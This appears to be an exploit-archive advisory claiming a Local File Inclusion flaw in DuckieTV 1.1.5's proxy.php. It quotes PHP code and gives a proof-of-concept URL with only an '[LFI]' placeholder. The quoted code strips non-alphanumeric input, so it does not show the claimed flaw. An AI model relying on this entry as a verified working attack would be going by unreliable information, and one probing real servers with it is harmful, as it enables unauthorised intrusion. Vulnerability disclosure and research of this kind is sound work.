DuckieTV CMS 1.1.5 Local File Inclusion Vulnerability

2017-10-14T00:00:00
ID 1337DAY-ID-28790
Type zdt
Reporter M.R.S.L.Y
Modified 2017-10-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ___________________________________________________
|
| Exploit Title: DuckieTV CMS Local File Inclusion
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage: http://schizoduckie.github.io/DuckieTV/
| Software Link:
https://github.com/SchizoDuckie/DuckieTV/archive/angular.zip
| Version: DuckieTV 1.1.5
| Date: 2017-10-14
| Category: webapps
| Tested on: Kali-Linux /FireFox
| CVE : CVE-2016-4314
|__________________________________________________

 Vulnerable File :

$cache = strtolower(preg_replace('/[^a-zA-Z0-9]/', '',
$_GET['url'])).'.json';

// if there's a cached version of this request in fixtures, serve it.
if(file_exists(dirname(__FILE__).'/fixtures/'.$cache)) {
    $out =
json_decode(file_get_contents(dirname(__FILE__).'/fixtures/'.$cache),true);
    $out['headers']['Content-Length'] = strlen($out['content']);
    unset($out['headers']['Transfer-Encoding']);
    unset($out['headers']['Cookie']);
    foreach($out['headers'] as $key=>$val) {
        header("{$key}: {$val}");
    }
    header('Proxy-Cache-hit: '.$cache);
    die($out['content']);
} else {
    header('Proxy-Cache-miss: '.$cache);
}

Proof of Concept :

http://127.0.0.1/7/DuckieTV-angular/tests/proxy.php?url=[LFI]

__________________________________________________

Discovered By : M.R.S.L.Y

#  0day.today [2018-03-05]  #